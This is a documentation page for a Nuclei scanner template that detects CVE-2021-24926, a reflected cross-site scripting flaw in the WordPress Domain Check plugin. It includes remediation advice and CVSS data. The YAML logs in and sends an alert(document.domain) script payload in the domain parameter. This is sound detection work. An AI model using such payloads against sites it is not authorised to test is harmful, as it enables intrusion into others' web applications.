WordPress Domain Check <1.0.17 - Cross-Site Scripting
ID: CVE-2021-24926
Severity: medium
Author: cckuailong
Tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin
Description
Section titled “Description”WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.
YAML Source
Section titled “YAML Source”id: CVE-2021-24926
info: name: WordPress Domain Check <1.0.17 - Cross-Site Scripting author: cckuailong severity: medium description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page. remediation: | Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733 - https://nvd.nist.gov/vuln/detail/CVE-2021-24926 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 epss-percentile: 0.54011 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: domaincheckplugin product: domain_check framework: wordpress tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "<script>alert(document.domain)</script>" - "Domain Check" condition: and
- type: status status: - 200# digest: 490a0046304402206a2090743c1eba51c5fa6ff5054b66b441424fa6a538b38b735fc404a47c9ddd0220530e867eab3d3d8e157180631799d06dac977e1c96f16f7901af083dd3ed7df5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24926.yaml"